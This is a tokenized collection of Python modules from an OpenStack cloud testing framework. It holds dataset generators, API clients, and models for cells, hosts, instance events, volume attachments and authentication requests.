<EOL> """<STR_LIT>""" <EOL> image_list = cls . _get_images ( ) <EOL> image_list = cls . _filter_model_list ( <EOL> image_list , model_filter = image_filter , <EOL> filter_mode = image_filter_mode ) <EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . 
_filter_model_list ( <EOL> volume_type_list , model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vtype in volume_type_list : <EOL> for image in image_list : <EOL> data = { '<STR_LIT>' : vtype , <EOL> '<STR_LIT:image>' : image } <EOL> testname = "<STR_LIT>" . format ( <EOL> str ( vtype . name ) . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) , <EOL> str ( image . name ) . replace ( "<STR_LIT:U+0020>" , "<STR_LIT:_>" ) ) <EOL> dataset_list . append_new_dataset ( testname , data ) <EOL> return cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> @ classmethod <EOL> def flavors_by_images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None , <EOL> flavor_filter = None , volume_type_filter = None , image_filter = None , <EOL> flavor_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> volume_type_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , <EOL> image_filter_mode = ModelBasedDatasetToolkit . INCLUSION_MODE , ) : <EOL> """<STR_LIT>""" <EOL> image_list = cls . _get_images ( ) <EOL> image_list = cls . _filter_model_list ( <EOL> image_list , model_filter = image_filter , <EOL> filter_mode = image_filter_mode ) <EOL> flavor_list = cls . _get_flavors ( ) <EOL> flavor_list = cls . _filter_model_list ( <EOL> flavor_list , model_filter = flavor_filter , <EOL> filter_mode = flavor_filter_mode ) <EOL> volume_type_list = cls . _get_volume_types ( ) <EOL> volume_type_list = cls . _filter_model_list ( <EOL> volume_type_list , model_filter = volume_type_filter , <EOL> filter_mode = volume_type_filter_mode ) <EOL> dataset_list = DatasetList ( ) <EOL> for vtype in volume_type_list : <EOL> for flavor in flavor_list : <EOL> for image in image_list : <EOL> data = { '<STR_LIT>' : vtype , <EOL> '<STR_LIT>' : flavor , <EOL> '<STR_LIT:image>' : image } <EOL> testname = "<STR_LIT>" . format ( <EOL> flavor = str ( flavor . 
name ) , image = str ( image . name ) , <EOL> vtype = str ( vtype . name ) ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:_>' ) . replace ( <EOL> '<STR_LIT:.>' , '<STR_LIT:_>' ) . replace ( '<STR_LIT:(>' , '<STR_LIT>' ) . replace ( '<STR_LIT:)>' , '<STR_LIT>' ) <EOL> dataset_list . append_new_dataset ( testname , data ) <EOL> return cls . _modify_dataset_list ( <EOL> dataset_list , max_datasets = max_datasets , randomize = randomize ) <EOL> @ classmethod <EOL> def configured_images ( cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> return cls . images ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> model_filter = image_filter , filter_mode = image_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . images_by_volume_type ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , volume_type_filter = volume_type_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> volume_type_filter_mode = volume_type_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_flavor ( cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> flavor_filter = cls . _volumes . config . flavor_filter <EOL> flavor_filter_mode = cls . _volumes . config . flavor_filter_mode <EOL> return cls . 
images_by_flavor ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , flavor_filter = flavor_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> flavor_filter_mode = flavor_filter_mode ) <EOL> @ classmethod <EOL> def configured_images_by_flavor_by_volume_type ( <EOL> cls , max_datasets = None , randomize = None ) : <EOL> """<STR_LIT>""" <EOL> image_filter = cls . _volumes . config . image_filter <EOL> image_filter_mode = cls . _volumes . config . image_filter_mode <EOL> flavor_filter = cls . _volumes . config . flavor_filter <EOL> flavor_filter_mode = cls . _volumes . config . flavor_filter_mode <EOL> volume_type_filter = cls . _volumes . config . volume_type_filter <EOL> volume_type_filter_mode = cls . _volumes . config . volume_type_filter_mode <EOL> return cls . flavors_by_images_by_volume_type ( <EOL> max_datasets = max_datasets , randomize = randomize , <EOL> image_filter = image_filter , flavor_filter = flavor_filter , <EOL> image_filter_mode = image_filter_mode , <EOL> flavor_filter_mode = flavor_filter_mode , <EOL> volume_type_filter = volume_type_filter , <EOL> volume_type_filter_mode = volume_type_filter_mode ) </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . cloudkeep . barbican . client import BarbicanRestClient <EOL> from cloudcafe . cloudkeep . barbican . version . models . version import Version <EOL> class VersionClient ( BarbicanRestClient ) : <EOL> def __init__ ( self , url , token = None , serialize_format = None , <EOL> deserialize_format = None ) : <EOL> """<STR_LIT>""" <EOL> super ( VersionClient , self ) . __init__ ( <EOL> token = token , serialize_format = serialize_format , <EOL> deserialize_format = deserialize_format ) <EOL> self . url = url <EOL> def get_version ( self , headers = None ) : <EOL> """<STR_LIT>""" <EOL> resp = self . request ( '<STR_LIT:GET>' , self . url , headers = headers , <EOL> response_entity_type = Version ) <EOL> return resp </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import xml . etree . ElementTree as ET <EOL> from cafe . engine . models . base import AutoMarshallingModel <EOL> from cloudcafe . compute . common . equality_tools import EqualityTools <EOL> from cloudcafe . compute . cells_api . model . capacity import CellCapacity <EOL> class Cell ( AutoMarshallingModel ) : <EOL> def __init__ ( self , disk_capacity = None , ram_capacity = None ) : <EOL> super ( Cell , self ) . __init__ ( ) <EOL> self . disk_capacity = disk_capacity <EOL> self . ram_capacity = ram_capacity <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return EqualityTools . are_objects_equal ( self , other ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> @ classmethod <EOL> def _json_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> json_dict = json . loads ( serialized_str ) <EOL> disk_capacity_dict = json_dict . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) <EOL> disk_capacity = CellCapacity . _dict_to_obj ( disk_capacity_dict ) <EOL> ram_capacity_dict = json_dict . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) . get ( '<STR_LIT>' ) <EOL> ram_capacity = CellCapacity . _dict_to_obj ( ram_capacity_dict ) <EOL> cell = Cell ( disk_capacity , ram_capacity ) <EOL> return cell <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , cell_dict ) : <EOL> """<STR_LIT>""" <EOL> cell = Cell ( ** cell_dict ) <EOL> return cell <EOL> @ classmethod <EOL> def _xml_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> element = ET . fromstring ( serialized_str ) <EOL> capacity = element . find ( '<STR_LIT>' ) <EOL> ram_capacity_xml = capacity . find ( '<STR_LIT>' ) <EOL> ram_capacity = CellCapacity . _xml_to_obj ( ram_capacity_xml ) <EOL> disk_capacity_xml = capacity . find ( "<STR_LIT>" ) <EOL> disk_capacity = CellCapacity . _xml_to_obj ( disk_capacity_xml ) <EOL> cell = Cell ( disk_capacity , ram_capacity ) <EOL> return cell </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . compute . events . models . base import EventBaseModel <EOL> from cloudcafe . compute . events . models . common import FixedIps <EOL> BASE_KWARG_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT:host>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT:state>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> class InstanceResizeConfirmStart ( EventBaseModel ) : <EOL> """<STR_LIT>""" <EOL> kwarg_map = { } <EOL> kwarg_map . 
update ( BASE_KWARG_MAP ) <EOL> def __init__ ( self , access_ip_v4 , access_ip_v6 , architecture , <EOL> availability_zone , cell_name , created_at , deleted_at , <EOL> disk_gb , display_name , ephemeral_gb , host , hostname , <EOL> image_meta , image_ref_url , instance_flavor_id , instance_id , <EOL> instance_type , instance_type_id , kernel_id , launched_at , <EOL> memory_mb , metadata , node , os_type , progress , ramdisk_id , <EOL> reservation_id , root_gb , state , state_description , tenant_id , <EOL> terminated_at , user_id , vcpus ) : <EOL> super ( InstanceResizeConfirmStart , self ) . __init__ ( locals ( ) ) <EOL> class InstanceResizeConfirmEnd ( EventBaseModel ) : <EOL> """<STR_LIT>""" <EOL> kwarg_map = { '<STR_LIT>' : '<STR_LIT>' } <EOL> kwarg_map . update ( BASE_KWARG_MAP ) <EOL> def __init__ ( self , access_ip_v4 , access_ip_v6 , architecture , <EOL> availability_zone , cell_name , created_at , deleted_at , <EOL> disk_gb , display_name , ephemeral_gb , fixed_ips , host , <EOL> hostname , image_meta , image_ref_url , instance_flavor_id , <EOL> instance_id , instance_type , instance_type_id , kernel_id , <EOL> launched_at , memory_mb , metadata , node , os_type , progress , <EOL> ramdisk_id , reservation_id , root_gb , state , state_description , <EOL> tenant_id , terminated_at , user_id , vcpus ) : <EOL> super ( InstanceResizeConfirmEnd , self ) . __init__ ( locals ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , json_dict ) : <EOL> """<STR_LIT>""" <EOL> obj = cls . _map_values_to_kwargs ( json_dict ) <EOL> obj . fixed_ips = FixedIps . _list_to_obj ( obj . fixed_ips ) <EOL> return obj </s>
<s> """<STR_LIT>""" <EOL> from cloudcafe . compute . common . composites import BaseComputeComposite <EOL> from cloudcafe . compute . extensions . rescue_api . client import RescueClient <EOL> class RescueComposite ( BaseComputeComposite ) : <EOL> def __init__ ( self , auth_composite ) : <EOL> super ( RescueComposite , self ) . __init__ ( auth_composite ) <EOL> self . client = RescueClient ( ** self . compute_auth_composite . client_args ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import xml . etree . ElementTree as ET <EOL> from cafe . engine . models . base import AutoMarshallingModel <EOL> from cloudcafe . compute . common . equality_tools import EqualityTools <EOL> from cloudcafe . compute . hosts_api . models . resources import Resource <EOL> class Host ( AutoMarshallingModel ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> for key , value in kwargs . iteritems ( ) : <EOL> setattr ( self , key , value ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return EqualityTools . are_objects_equal ( self , other ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> @ classmethod <EOL> def _json_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> json_dict = json . loads ( serialized_str ) <EOL> if '<STR_LIT:host>' in json_dict . keys ( ) : <EOL> resources = [ ] <EOL> for resource in json_dict . get ( "<STR_LIT:host>" ) : <EOL> resources . append ( <EOL> Resource . _dict_to_obj ( resource . get ( "<STR_LIT>" ) ) ) <EOL> host = Host ( resources = resources ) <EOL> return host <EOL> if '<STR_LIT>' in json_dict . keys ( ) : <EOL> hosts = [ ] <EOL> for host_dict in json_dict . get ( "<STR_LIT>" ) : <EOL> hosts . append ( cls . _dict_to_obj ( host_dict ) ) <EOL> return hosts <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , host_dict ) : <EOL> """<STR_LIT>""" <EOL> host = Host ( ** host_dict ) <EOL> return host <EOL> @ classmethod <EOL> def _xml_to_obj ( cls , serialized_str ) : <EOL> """<STR_LIT>""" <EOL> element = ET . fromstring ( serialized_str ) <EOL> if element . tag == '<STR_LIT:host>' : <EOL> resources = [ ] <EOL> for resource in element . _children : <EOL> resources . append ( Resource . _xml_to_obj ( resource ) ) <EOL> host = Host ( resources = resources ) <EOL> return host <EOL> if element . tag == '<STR_LIT>' : <EOL> hosts = [ ] <EOL> for host in element . findall ( '<STR_LIT:host>' ) : <EOL> host = cls . 
_xml_ele_to_obj ( host ) <EOL> hosts . append ( host ) <EOL> return hosts <EOL> @ classmethod <EOL> def _xml_ele_to_obj ( cls , element ) : <EOL> """<STR_LIT>""" <EOL> host = Host ( ** element . attrib ) <EOL> return host </s>
<s> from time import sleep , time <EOL> from cloudcafe . common . behaviors import ( <EOL> StatusProgressionVerifier , StatusProgressionVerifierError ) <EOL> from cloudcafe . compute . common . behaviors import BaseComputeBehavior <EOL> from cloudcafe . compute . volume_attachments_api . config import VolumeAttachmentsAPIConfig <EOL> class VolumeAttachmentBehaviorError ( Exception ) : <EOL> pass <EOL> class VolumeAttachmentsAPI_Behaviors ( BaseComputeBehavior ) : <EOL> def __init__ ( <EOL> self , volume_attachments_client = None , <EOL> volume_attachments_config = None , volumes_client = None ) : <EOL> super ( VolumeAttachmentsAPI_Behaviors , self ) . __init__ ( ) <EOL> self . client = volume_attachments_client <EOL> self . config = volume_attachments_config or VolumeAttachmentsAPIConfig ( ) <EOL> self . volumes_client = volumes_client <EOL> def _validated_volume_attach ( self , server_id , volume_id , device = None ) : <EOL> """<STR_LIT>""" <EOL> resp = self . client . attach_volume ( server_id , volume_id , device = device ) <EOL> if not resp . ok : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( resp . status_code , volume_id , server_id ) ) <EOL> if resp . entity is None : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> volume_id , server_id ) ) <EOL> return resp <EOL> def _validated_volume_detach ( self , attachment_id , server_id ) : <EOL> resp = self . client . delete_volume_attachment ( <EOL> attachment_id , server_id ) <EOL> if not resp . ok : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( resp . status_code , attachment_id , server_id ) ) <EOL> return resp <EOL> def _get_volume_status ( self , volume_id ) : <EOL> resp = self . volumes_client . get_volume_info ( volume_id = volume_id ) <EOL> if not resp . ok : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( resp . 
status_code ) ) <EOL> self . _log . error ( msg ) <EOL> raise Exception ( msg ) <EOL> if resp . entity is None : <EOL> msg = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . _log . error ( msg ) <EOL> raise Exception ( msg ) <EOL> return resp . entity . status <EOL> def wait_for_attachment_to_propagate ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = <NUM_LIT:5> ) : <EOL> timeout = timeout or self . config . attachment_propagation_timeout <EOL> poll_rate = poll_rate or self . config . api_poll_rate <EOL> endtime = time ( ) + int ( timeout ) <EOL> while time ( ) < endtime : <EOL> resp = self . client . get_volume_attachment_details ( <EOL> attachment_id , server_id ) <EOL> if resp . ok : <EOL> return True <EOL> sleep ( poll_rate ) <EOL> else : <EOL> return False <EOL> def wait_for_attachment_to_delete ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = None ) : <EOL> timeout = timeout or self . config . attachment_propagation_timeout <EOL> poll_rate = poll_rate or self . config . api_poll_rate <EOL> endtime = time ( ) + int ( timeout ) <EOL> while time ( ) < endtime : <EOL> resp = self . client . get_volume_attachment_details ( <EOL> attachment_id , server_id ) <EOL> if resp . status_code == <NUM_LIT> : <EOL> return None <EOL> sleep ( poll_rate ) <EOL> else : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> attachment_id , server_id , timeout ) ) <EOL> def verify_volume_status_progression_during_attachment ( <EOL> self , volume_id , state_list = None ) : <EOL> verifier = StatusProgressionVerifier ( <EOL> '<STR_LIT>' , volume_id , self . _get_volume_status , volume_id ) <EOL> verifier . set_global_state_properties ( <EOL> timeout = self . config . attachment_timeout ) <EOL> verifier . 
add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT>' , '<STR_LIT:error>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . start ( ) <EOL> def verify_volume_status_progression_during_detachment ( <EOL> self , volume_id , raise_on_error = True ) : <EOL> """<STR_LIT>""" <EOL> verifier = StatusProgressionVerifier ( <EOL> '<STR_LIT>' , volume_id , self . _get_volume_status , volume_id ) <EOL> verifier . set_global_state_properties ( <EOL> timeout = self . config . attachment_timeout ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> acceptable_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> verifier . 
add_state ( <EOL> expected_statuses = [ '<STR_LIT>' ] , <EOL> error_statuses = [ <EOL> '<STR_LIT:error>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> poll_rate = self . config . api_poll_rate , <EOL> poll_failure_retry_limit = <NUM_LIT:3> ) <EOL> try : <EOL> verifier . start ( ) <EOL> except Exception as exception : <EOL> if raise_on_error : <EOL> raise exception <EOL> def attach_volume_to_server ( <EOL> self , server_id , volume_id , device = None , <EOL> attachment_propagation_timeout = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> attachment_propagation_timeout = ( <EOL> attachment_propagation_timeout <EOL> or self . config . attachment_propagation_timeout ) <EOL> resp = self . _validated_volume_attach ( server_id , volume_id , device ) <EOL> attachment = resp . entity <EOL> propagated = self . wait_for_attachment_to_propagate ( <EOL> attachment . id_ , server_id , timeout = attachment_propagation_timeout ) <EOL> if not propagated : <EOL> raise VolumeAttachmentBehaviorError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> attachment . id_ , server_id , attachment_propagation_timeout ) ) <EOL> self . verify_volume_status_progression_during_attachment ( volume_id ) <EOL> return attachment <EOL> def delete_volume_attachment ( <EOL> self , attachment_id , server_id , timeout = None , poll_rate = None ) : <EOL> """<STR_LIT>""" <EOL> self . _validated_volume_detach ( attachment_id , server_id ) <EOL> self . wait_for_attachment_to_delete ( <EOL> attachment_id , server_id , timeout , poll_rate ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from xml . etree import ElementTree <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . base import BaseIdentityModel <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . constants import V2_0Constants <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . requests . credentials import ApiKeyCredentials <EOL> from cloudcafe . extensions . rax_auth . v2_0 . tokens_api . models . requests . passcode import PasscodeCredentials <EOL> class Auth ( BaseIdentityModel ) : <EOL> ROOT_TAG = '<STR_LIT>' <EOL> def __init__ ( self , apiKeyCredentials = None , passcodeCredentials = None , <EOL> tenantId = None , token = None ) : <EOL> super ( Auth , self ) . __init__ ( ) <EOL> self . apiKeyCredentials = apiKeyCredentials <EOL> self . passcode_credentials = passcodeCredentials <EOL> self . token = token <EOL> self . tenantId = tenantId <EOL> def _obj_to_json ( self ) : <EOL> ret = { } <EOL> if self . apiKeyCredentials is not None : <EOL> ret [ ApiKeyCredentials . JSON_ROOT_TAG ] = self . apiKeyCredentials . _obj_to_dict ( ) <EOL> if self . token is not None : <EOL> ret [ Token . ROOT_TAG ] = self . token . _obj_to_dict ( ) <EOL> if self . tenantId is not None : <EOL> ret [ '<STR_LIT>' ] = self . tenantId <EOL> else : <EOL> ret [ PasscodeCredentials . RAW_NAME ] = self . passcode_credentials . _obj_to_dict ( ) <EOL> ret = { self . ROOT_TAG : ret } <EOL> return json . dumps ( ret ) <EOL> def _obj_to_xml ( self ) : <EOL> ele = self . _obj_to_xml_ele ( ) <EOL> if self . apiKeyCredentials is not None : <EOL> ele . find ( ApiKeyCredentials . ROOT_TAG ) . set ( <EOL> '<STR_LIT>' , <EOL> V2_0Constants . XML_NS_RAX_KSKEY ) <EOL> else : <EOL> ele . set ( '<STR_LIT>' , V2_0Constants . XML_NS_XSI ) <EOL> ele . set ( '<STR_LIT>' , V2_0Constants . XML_NS ) <EOL> return ElementTree . tostring ( ele ) <EOL> def _obj_to_xml_ele ( self ) : <EOL> element = ElementTree . Element ( self . 
ROOT_TAG ) <EOL> if self . apiKeyCredentials is not None : <EOL> element . append ( self . apiKeyCredentials . _obj_to_xml_ele ( ) ) <EOL> if self . token is not None : <EOL> element . append ( self . token . _obj_to_xml_ele ( ) ) <EOL> if self . tenantId is not None : <EOL> element . set ( '<STR_LIT>' , self . tenantId ) <EOL> return element <EOL> class Token ( BaseIdentityModel ) : <EOL> ROOT_TAG = '<STR_LIT>' <EOL> def __init__ ( self , id = None ) : <EOL> super ( Token , self ) . __init__ ( ) <EOL> self . id = id <EOL> def _obj_to_dict ( self ) : <EOL> ret = { } <EOL> if self . id is not None : <EOL> ret [ '<STR_LIT:id>' ] = self . id <EOL> return ret <EOL> def _obj_to_xml ( self ) : <EOL> return ElementTree . tostring ( self . _obj_to_xml_ele ( ) ) <EOL> def _obj_to_xml_ele ( self ) : <EOL> element = ElementTree . Element ( self . ROOT_TAG ) <EOL> if self . id is not None : <EOL> element . set ( '<STR_LIT:id>' , self . id ) <EOL> return element </s>
<s> """<STR_LIT>""" <EOL> class V2_0Constants ( object ) : <EOL> XML_NS = '<STR_LIT>' <EOL> XML_NS_OPENSTACK_COMMON = '<STR_LIT>' <EOL> XML_NS_XSI = '<STR_LIT>' <EOL> XML_NS_OS_KSADM = '<STR_LIT>' <EOL> XML_NS_OS_KSEC2 = '<STR_LIT>' <EOL> XML_NS_RAX_KSQA = '<STR_LIT>' <EOL> XML_NS_RAX_KSKEY = '<STR_LIT>' <EOL> XML_NS_RAX_AUTH = '<STR_LIT>' <EOL> XML_NS_RAX_KSGRP = '<STR_LIT>' <EOL> XML_NS_ATOM = '<STR_LIT>' <EOL> class AdminExtensions ( object ) : <EOL> OS_KS_ADM = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from datetime import datetime <EOL> from json import dumps as json_to_str <EOL> from cafe . engine . models . base import ( AutoMarshallingModel , <EOL> AutoMarshallingListModel ) <EOL> class SystemInfo ( AutoMarshallingModel ) : <EOL> def __init__ ( self , disk_usage = None , os_type = None , memory_mb = None , <EOL> architecture = None , cpu_cores = None , load_average = None , <EOL> timestamp = None ) : <EOL> super ( SystemInfo , self ) . __init__ ( ) <EOL> self . os_type = os_type <EOL> self . memory_mb = memory_mb <EOL> self . architecture = architecture <EOL> self . cpu_cores = cpu_cores <EOL> self . load_average = load_average <EOL> self . disk_usage = disk_usage <EOL> self . timestamp = timestamp <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> def _obj_to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT>' : self . os_type , <EOL> '<STR_LIT>' : self . memory_mb , <EOL> '<STR_LIT>' : self . architecture , <EOL> '<STR_LIT>' : self . cpu_cores , <EOL> '<STR_LIT>' : self . disk_usage . _obj_to_dict ( ) , <EOL> '<STR_LIT>' : self . load_average . _obj_to_dict ( ) , <EOL> '<STR_LIT>' : self . timestamp or datetime . utcnow ( ) . isoformat ( ) <EOL> } <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , dic ) : <EOL> disk_usage = DiskUsage . _dict_to_obj ( dic . get ( '<STR_LIT>' ) ) <EOL> load_average = LoadAverage . _dict_to_obj ( dic . get ( '<STR_LIT>' ) ) <EOL> kwargs = { <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : disk_usage , <EOL> '<STR_LIT>' : load_average , <EOL> '<STR_LIT>' : dic . 
get ( '<STR_LIT>' ) <EOL> } <EOL> return SystemInfo ( ** kwargs ) <EOL> class LoadAverage ( AutoMarshallingModel ) : <EOL> def __init__ ( self , one_average = None , five_average = None , <EOL> fifteen_average = None ) : <EOL> super ( LoadAverage , self ) . __init__ ( ) <EOL> self . one_average = one_average <EOL> self . five_average = five_average <EOL> self . fifteen_average = fifteen_average <EOL> def _obj_to_dict ( self ) : <EOL> return { <EOL> '<STR_LIT:1>' : self . one_average , <EOL> '<STR_LIT:5>' : self . five_average , <EOL> '<STR_LIT>' : self . fifteen_average <EOL> } <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , dic ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:1>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:5>' ) , <EOL> '<STR_LIT>' : dic . get ( '<STR_LIT:5>' ) <EOL> } <EOL> return LoadAverage ( ** kwargs ) <EOL> class DiskUsage ( AutoMarshallingListModel ) : <EOL> def _obj_to_dict ( self ) : <EOL> return [ disk . _obj_to_dict ( ) for disk in self ] <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . _obj_to_dict ( ) ) <EOL> @ classmethod <EOL> def _dict_to_obj ( cls , json_dict ) : <EOL> usage = cls ( ) <EOL> for disk in json_dict : <EOL> part = Partition ( name = disk . get ( '<STR_LIT>' ) , <EOL> used = disk . get ( '<STR_LIT>' ) , <EOL> total = disk . get ( '<STR_LIT>' ) ) <EOL> usage . append ( part ) <EOL> return usage <EOL> class Partition ( AutoMarshallingModel ) : <EOL> def __init__ ( self , name = None , total = None , used = None ) : <EOL> super ( Partition , self ) . __init__ ( ) <EOL> self . name = name <EOL> self . total = total <EOL> self . used = used <EOL> def _obj_to_dict ( self ) : <EOL> body = { <EOL> '<STR_LIT>' : self . name , <EOL> '<STR_LIT>' : self . total , <EOL> '<STR_LIT>' : self . used <EOL> } <EOL> return body <EOL> def _obj_to_json ( self ) : <EOL> return json_to_str ( self . 
_obj_to_dict ( ) ) </s>
